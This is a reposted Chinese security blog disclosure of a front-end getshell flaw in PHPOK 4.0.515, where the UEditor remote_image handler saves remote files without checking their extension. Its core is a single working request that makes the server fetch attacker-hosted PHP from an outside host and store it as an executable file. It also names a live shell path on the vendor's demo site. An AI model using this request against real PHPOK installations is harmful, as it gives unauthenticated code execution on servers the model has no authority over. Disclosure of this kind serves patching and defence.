phpok通杀前台getshell 4.0.515官方demo测试成功

没穿底裤 2020年1月1日04:34:14评论651 views字数 394阅读1分18秒阅读模式
摘要

无任何限制,不用注册账号,不用csrf,不用注入。一个请求直接getshell。
不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题


漏洞作者: 索马里的海贼

简要描述:

无任何限制,不用注册账号,不用csrf,不用注入。一个请求直接getshell。
不得不说phpok的输入处理做的还是不错的。。。不过这里就出了一个问题

详细说明:

/framework/www/ueditor_control.php行61

remote_image_f函数没对远程文件后缀做检查直接保存到本地

这个真心没什么好分析的我就不贴代码分析了

漏洞证明:

构造请求

/index.php?c=ueditor&f=remote_image&upfile=http://qaz.me/1.txt?.php  我这里1.txt的内容是
<?php phpinfo();?>  测试问题嘛 不做破坏  phpok通杀前台getshell 4.0.515官方demo测试成功  shell地址直接返回了。这里不返回也没事,文件名可以自己算出来。 http://www.phpok.com/res/201406/01/d0cb55e3d1b41b9a_36_0.php  phpok通杀前台getshell 4.0.515官方demo测试成功  

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
没穿底裤
  • 本文由 发表于 2020年1月1日04:34:14
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   phpok通杀前台getshell 4.0.515官方demo测试成功https://cn-sec.com/archives/75620.html

发表评论

匿名网友 填写信息